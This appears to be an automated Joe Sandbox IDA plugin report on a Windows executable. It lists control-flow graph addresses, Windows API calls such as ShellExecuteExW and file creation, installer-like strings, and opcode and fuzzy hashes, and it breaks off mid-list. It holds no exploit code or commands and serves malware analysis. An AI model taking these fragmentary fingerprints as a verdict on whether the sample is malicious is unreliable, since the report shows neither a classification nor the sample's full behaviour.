                                                                    • Instruction Fuzzy Hash: 69916E22E05B52AAEB01EF65E8406BCB3B5FB08B54FA44835DE0D17B54EFB8E445D320

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1988 7ff731c9f460-7ff731c9f4a3 1989 7ff731c9f814-7ff731c9f839 call 7ff731c71fa0 call 7ff731ca22a0 1988->1989 1990 7ff731c9f4a9-7ff731c9f4e5 call 7ff731ca3c70 1988->1990 1996 7ff731c9f4e7 1990->1996 1997 7ff731c9f4ea-7ff731c9f4f1 1990->1997 1996->1997 1999 7ff731c9f502-7ff731c9f506 1997->1999 2000 7ff731c9f4f3-7ff731c9f4f7 1997->2000 2001 7ff731c9f508 1999->2001 2002 7ff731c9f50b-7ff731c9f516 1999->2002 2003 7ff731c9f4f9 2000->2003 2004 7ff731c9f4fc-7ff731c9f500 2000->2004 2001->2002 2005 7ff731c9f5a8 2002->2005 2006 7ff731c9f51c 2002->2006 2003->2004 2004->2002 2008 7ff731c9f5ac-7ff731c9f5af 2005->2008 2007 7ff731c9f522-7ff731c9f529 2006->2007 2009 7ff731c9f52b 2007->2009 2010 7ff731c9f52e-7ff731c9f533 2007->2010 2011 7ff731c9f5b1-7ff731c9f5b5 2008->2011 2012 7ff731c9f5b7-7ff731c9f5ba 2008->2012 2009->2010 2013 7ff731c9f565-7ff731c9f570 2010->2013 2014 7ff731c9f535 2010->2014 2011->2012 2015 7ff731c9f5e0-7ff731c9f5f3 call 7ff731c8636c 2011->2015 2012->2015 2016 7ff731c9f5bc-7ff731c9f5c3 2012->2016 2017 7ff731c9f572 2013->2017 2018 7ff731c9f575-7ff731c9f57a 2013->2018 2019 7ff731c9f54a-7ff731c9f550 2014->2019 2033 7ff731c9f5f5-7ff731c9f613 call 7ff731c91344 2015->2033 2034 7ff731c9f618-7ff731c9f66d call 7ff731ca78fc call 7ff731c7129c call 7ff731c83268 call 7ff731c71fa0 2015->2034 2016->2015 2020 7ff731c9f5c5-7ff731c9f5dc 2016->2020 2017->2018 2022 7ff731c9f580-7ff731c9f587 2018->2022 2023 7ff731c9f83a-7ff731c9f841 2018->2023 2024 7ff731c9f552 2019->2024 2025 7ff731c9f537-7ff731c9f53e 2019->2025 2020->2015 2027 7ff731c9f589 2022->2027 2028 7ff731c9f58c-7ff731c9f592 2022->2028 2031 7ff731c9f843 2023->2031 2032 7ff731c9f846-7ff731c9f84b 2023->2032 2024->2013 2029 7ff731c9f540 2025->2029 2030 7ff731c9f543-7ff731c9f548 2025->2030 2027->2028 2028->2023 2037 7ff731c9f598-7ff731c9f5a2 2028->2037 2029->2030 2030->2019 2038 7ff731c9f554-7ff731c9f55b 2030->2038 2031->2032 2039 7ff731c9f85e-7ff731c9f866 2032->2039 2040 7ff731c9f84d-7ff731c9f854 2032->2040 2033->2034 2055 7ff731c9f66f-7ff731c9f6bd call 7ff731ca78fc call 7ff731c7129c call 7ff731c85b20 call 7ff731c71fa0 2034->2055 2056 7ff731c9f6c2-7ff731c9f6cf ShellExecuteExW 2034->2056 2037->2005 2037->2007 2045 7ff731c9f560 2038->2045 2046 7ff731c9f55d 2038->2046 2042 7ff731c9f868 2039->2042 2043 7ff731c9f86b-7ff731c9f876 2039->2043 2047 7ff731c9f856 2040->2047 2048 7ff731c9f859 2040->2048 2042->2043 2043->2008 2045->2013 2046->2045 2047->2048 2048->2039 2055->2056 2057 7ff731c9f7c6-7ff731c9f7ce 2056->2057 2058 7ff731c9f6d5-7ff731c9f6df 2056->2058 2060 7ff731c9f7d0-7ff731c9f7e6 2057->2060 2061 7ff731c9f802-7ff731c9f80f 2057->2061 2062 7ff731c9f6ef-7ff731c9f6f2 2058->2062 2063 7ff731c9f6e1-7ff731c9f6e4 2058->2063 2065 7ff731c9f7e8-7ff731c9f7fb 2060->2065 2066 7ff731c9f7fd call 7ff731ca218c 2060->2066 2061->1989 2068 7ff731c9f6f4-7ff731c9f6ff call 7ff731cde188 2062->2068 2069 7ff731c9f70e-7ff731c9f72d call 7ff731cde1b8 call 7ff731c9fda4 2062->2069 2063->2062 2067 7ff731c9f6e6-7ff731c9f6ed 2063->2067 2065->2066 2071 7ff731c9f87b-7ff731c9f883 call 7ff731ca7884 2065->2071 2066->2061 2067->2062 2073 7ff731c9f763-7ff731c9f770 CloseHandle 2067->2073 2068->2069 2089 7ff731c9f701-7ff731c9f70c ShowWindow 2068->2089 2069->2073 2095 7ff731c9f72f-7ff731c9f732 2069->2095 2079 7ff731c9f772-7ff731c9f783 call 7ff731c91344 2073->2079 2080 7ff731c9f785-7ff731c9f78c 2073->2080 2079->2080 2087 7ff731c9f7ae-7ff731c9f7b0 2079->2087 2080->2087 2088 7ff731c9f78e-7ff731c9f791 2080->2088 2087->2057 2094 7ff731c9f7b2-7ff731c9f7b5 2087->2094 2088->2087 2093 7ff731c9f793-7ff731c9f7a8 2088->2093 2089->2069 2093->2087 2094->2057 2097 7ff731c9f7b7-7ff731c9f7c5 ShowWindow 2094->2097 2095->2073 2098 7ff731c9f734-7ff731c9f745 GetExitCodeProcess 2095->2098 2097->2057 2098->2073 2099 7ff731c9f747-7ff731c9f75c 2098->2099 2099->2073
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_invalid_parameter_noinfo_noreturn
                                                                    • String ID: .exe$.inf$Install$p
                                                                    • API String ID: 1054546013-3607691742
                                                                    • Opcode ID: dd439fb9acd67611f37c1c3899ae494ad4728dfc081353623276918ed5a43e30
                                                                    • Instruction ID: 7c4e6b285985350e90e47af2432b292f0a28b79643eb7e73d77381e83743eacb
                                                                    • Opcode Fuzzy Hash: dd439fb9acd67611f37c1c3899ae494ad4728dfc081353623276918ed5a43e30
                                                                    • Instruction Fuzzy Hash: 70C19062F18702A5FB10EB25D94427DA7B1BF85B84FA44031CA4D47BA5EFBCE851E320

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                    • String ID:
                                                                    • API String ID: 3569833718-0
                                                                    • Opcode ID: 7d379054cb94ea220feff0600702c1a3525b366c45d8dc990373b330b6eb2c2b
                                                                    • Instruction ID: e1516681b4685e4541ed2cc8172332fcff68761ab66cce80842f41a40bb9e611
                                                                    • Opcode Fuzzy Hash: 7d379054cb94ea220feff0600702c1a3525b366c45d8dc990373b330b6eb2c2b
                                                                    • Instruction Fuzzy Hash: 12411172F146429AF700EF61E800BAA6360EB89F98FA01036DD0A07B94CFBDE4459764
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3668304517-0
                                                                    • Opcode ID: 272c4e36407371497009dfbdd07fcc185cf89d238bb2a2f1ba082823b8577246
                                                                    • Instruction ID: 0f37cec90e8c915279a079a0f67eee0bda06ea15a69126b8b1bffbee7f50d9f7
                                                                    • Opcode Fuzzy Hash: 272c4e36407371497009dfbdd07fcc185cf89d238bb2a2f1ba082823b8577246
                                                                    • Instruction Fuzzy Hash: 3A12E562F08741A9FB10EB65D4842ACA371EB457A8FA00232DE6C17AD9DFFCD546D350

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3520 7ff731c82480-7ff731c824bb 3521 7ff731c824bd-7ff731c824c4 3520->3521 3522 7ff731c824c6 3520->3522 3521->3522 3523 7ff731c824c9-7ff731c82538 3521->3523 3522->3523 3524 7ff731c8253d-7ff731c82568 CreateFileW 3523->3524 3525 7ff731c8253a 3523->3525 3526 7ff731c8256e-7ff731c8259e GetLastError call 7ff731c869cc 3524->3526 3527 7ff731c82648-7ff731c8264d 3524->3527 3525->3524 3536 7ff731c825ec 3526->3536 3537 7ff731c825a0-7ff731c825ea CreateFileW GetLastError 3526->3537 3528 7ff731c82653-7ff731c82657 3527->3528 3530 7ff731c82659-7ff731c8265c 3528->3530 3531 7ff731c82665-7ff731c82669 3528->3531 3530->3531 3533 7ff731c8265e 3530->3533 3534 7ff731c8266b-7ff731c8266f 3531->3534 3535 7ff731c8268f-7ff731c826a3 3531->3535 3533->3531 3534->3535 3538 7ff731c82671-7ff731c82689 SetFileTime 3534->3538 3539 7ff731c826cc-7ff731c826f5 call 7ff731ca22a0 3535->3539 3540 7ff731c826a5-7ff731c826b0 3535->3540 3541 7ff731c825f2-7ff731c825fa 3536->3541 3537->3541 3538->3535 3542 7ff731c826c8 3540->3542 3543 7ff731c826b2-7ff731c826ba 3540->3543 3544 7ff731c825fc-7ff731c82613 3541->3544 3545 7ff731c82633-7ff731c82646 3541->3545 3542->3539 3548 7ff731c826bc 3543->3548 3549 7ff731c826bf-7ff731c826c3 call 7ff731c720b0 3543->3549 3550 7ff731c8262e call 7ff731ca218c 3544->3550 3551 7ff731c82615-7ff731c82628 3544->3551 3545->3528 3548->3549 3549->3542 3550->3545 3551->3550 3553 7ff731c826f6-7ff731c826fb call 7ff731ca7884 3551->3553
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 3536497005-0
                                                                    • Opcode ID: 96e9081ff4bc34e56434afd79359cf8921b737578e2ea268c4aacff097592dd7
                                                                    • Instruction ID: d2afd0ef3f141fc99c0fe67883ff5b6be0b39c29086e71a99a1197ca15df691d
                                                                    • Opcode Fuzzy Hash: 96e9081ff4bc34e56434afd79359cf8921b737578e2ea268c4aacff097592dd7
                                                                    • Instruction Fuzzy Hash: 1061E162E0868196E7209B29E44436EA7B1FB887ACF601324DEAD03AD8CF7DD055D750

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
                                                                    • String ID: ]
                                                                    • API String ID: 3561356813-3352871620
                                                                    • Opcode ID: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                                                    • Instruction ID: 4d55840b32b008fdc48921cf9be9eb4864b16fdb8425cc28f53ad6c4d9179fec
                                                                    • Opcode Fuzzy Hash: c6bf9e19450fbf4cc7b28015e62d6f04fdd2e3c624e8f0d9c6f2b4e6ab7b0bdc
                                                                    • Instruction Fuzzy Hash: 48118621F0964661FB54BB11965437DD391AF88BC0FA80034D95D07B9AFEBCE914A720

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                    • String ID:
                                                                    • API String ID: 1266772231-0
                                                                    • Opcode ID: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                                                    • Instruction ID: c3a276f70f03f9036ad92b1ff6092563ac526942ebbeb49c1185af9ff57554e6
                                                                    • Opcode Fuzzy Hash: 48dfac8e33024647184e1a60fb39053494a02480d92f3e69543185b5e5c85bfd
                                                                    • Instruction Fuzzy Hash: DAF0FF37F38552A2FB50AB71E895AB6A361FFD0B05FE06031E54E41854DF6CD518DB20

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                    • String ID: EDIT
                                                                    • API String ID: 4243998846-3080729518
                                                                    • Opcode ID: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                                    • Instruction ID: 47a7853e175a7a9c21ca046134ce262c282c8f16d481427ed8423d5d9680f431
                                                                    • Opcode Fuzzy Hash: 3006384394de3d7d6335ffca3663b2ae555a506821308572bdb38291f1b12f27
                                                                    • Instruction Fuzzy Hash: B5018662F08A47A1FB20AB61F8143F6D390BF58740FD41035CD4E46655EEBCD149E620

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3830 7ff731c82ca0-7ff731c82cca 3831 7ff731c82ccc-7ff731c82cce 3830->3831 3832 7ff731c82cd3-7ff731c82cdb 3830->3832 3833 7ff731c82e69-7ff731c82e84 call 7ff731ca22a0 3831->3833 3834 7ff731c82cdd-7ff731c82ce8 GetStdHandle 3832->3834 3835 7ff731c82ceb 3832->3835 3834->3835 3837 7ff731c82cf1-7ff731c82cfd 3835->3837 3839 7ff731c82d46-7ff731c82d62 WriteFile 3837->3839 3840 7ff731c82cff-7ff731c82d04 3837->3840 3843 7ff731c82d66-7ff731c82d69 3839->3843 3841 7ff731c82d06-7ff731c82d3a WriteFile 3840->3841 3842 7ff731c82d6f-7ff731c82d73 3840->3842 3841->3843 3844 7ff731c82d3c-7ff731c82d42 3841->3844 3845 7ff731c82e62-7ff731c82e66 3842->3845 3846 7ff731c82d79-7ff731c82d7d 3842->3846 3843->3842 3843->3845 3844->3841 3847 7ff731c82d44 3844->3847 3845->3833 3846->3845 3848 7ff731c82d83-7ff731c82d98 call 7ff731c7b508 3846->3848 3847->3843 3851 7ff731c82dde-7ff731c82e2d call 7ff731ca78fc call 7ff731c7129c call 7ff731c7bcb8 3848->3851 3852 7ff731c82d9a-7ff731c82da1 3848->3852 3851->3845 3863 7ff731c82e2f-7ff731c82e46 3851->3863 3852->3837 3853 7ff731c82da7-7ff731c82da9 3852->3853 3853->3837 3855 7ff731c82daf-7ff731c82dd9 3853->3855 3855->3837 3864 7ff731c82e5d call 7ff731ca218c 3863->3864 3865 7ff731c82e48-7ff731c82e5b 3863->3865 3864->3845 3865->3864 3866 7ff731c82e85-7ff731c82e8b call 7ff731ca7884 3865->3866
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$Handle
                                                                    • String ID:
                                                                    • API String ID: 4209713984-0
                                                                    • Opcode ID: 0e2e947f5374c0ddd2130b56bb75e1f08e0d4936f885f01de5306a6f3d1a31f8
                                                                    • Instruction ID: f036d0b39bb0d2242793addd346991a262adfcc737c1a0be427bd7b225889f81
                                                                    • Opcode Fuzzy Hash: 0e2e947f5374c0ddd2130b56bb75e1f08e0d4936f885f01de5306a6f3d1a31f8
                                                                    • Instruction Fuzzy Hash: 9B510922F1964262FB10EB24D48877AA350FF48B91FA04132EA4E47AD4DFFCE985D710

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                    • String ID:
                                                                    • API String ID: 2912839123-0
                                                                    • Opcode ID: 7facb3930930602f0996268801a3c9d730c143456cf898398e6b94e3bd65bcf3
                                                                    • Instruction ID: a5a62f75f5fbd8061353f9300ee084b1906e6be9b725566c5b05232678f03aa0
                                                                    • Opcode Fuzzy Hash: 7facb3930930602f0996268801a3c9d730c143456cf898398e6b94e3bd65bcf3
                                                                    • Instruction Fuzzy Hash: 8C51A162F14752A4FF01ABA4D8452ADA322BB44BE4FA00A36DA5C17BD5DEACD450D360
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                    • String ID:
                                                                    • API String ID: 1452418845-0
                                                                    • Opcode ID: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                                    • Instruction ID: 616b32db13ed189138f7f8fcc4c251e78e63d61fc170d5ba530e47bc90466a0f
                                                                    • Opcode Fuzzy Hash: ac8e0d61ad9562805f3f0f4ceccdbb6567ef63bb883097c4bc40aa5993711c11
                                                                    • Instruction Fuzzy Hash: 37315C11E0C12266FB56BB2494123B9D391AF49384FE45C34EA0E4B2E7CEADE854E371
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 2359106489-0
                                                                    • Opcode ID: 16235a4791ee42a9e70d459a53685e17624415c9c9910e7c0b15a22c5901c021
                                                                    • Instruction ID: b33fd13b313f22230bf7449826f26342b3bfbe4cab2b7063826dae7cfb0ca39c
                                                                    • Opcode Fuzzy Hash: 16235a4791ee42a9e70d459a53685e17624415c9c9910e7c0b15a22c5901c021
                                                                    • Instruction Fuzzy Hash: 0231E822E0C78261EB20BB29A584279E351FF887D0FE46231EE9D47AC5DFBCD441D620
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FileHandleRead
                                                                    • String ID:
                                                                    • API String ID: 2244327787-0
                                                                    • Opcode ID: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                                    • Instruction ID: 4b1b9915f3811a164fd773f33e79c36e386fa2cab938314484a06d2af56da249
                                                                    • Opcode Fuzzy Hash: d9ea8162334859a899980f74fa79e6bbf85c98ea8a13f51b84765ec106e6a7b0
                                                                    • Instruction Fuzzy Hash: 8521A721E0CA1291EB20AB21E45833DE398FB49F94FB44131DA5D47A84CFBCE845E760
                                                                    APIs
                                                                      • Part of subcall function 00007FF731C8EC58: ResetEvent.KERNEL32 ref: 00007FF731C8EC71
                                                                      • Part of subcall function 00007FF731C8EC58: ReleaseSemaphore.KERNEL32 ref: 00007FF731C8EC87
                                                                    • ReleaseSemaphore.KERNEL32 ref: 00007FF731C8E8F0
                                                                    • CloseHandle.KERNELBASE ref: 00007FF731C8E90F
                                                                    • DeleteCriticalSection.KERNEL32 ref: 00007FF731C8E926
                                                                    • CloseHandle.KERNEL32 ref: 00007FF731C8E933
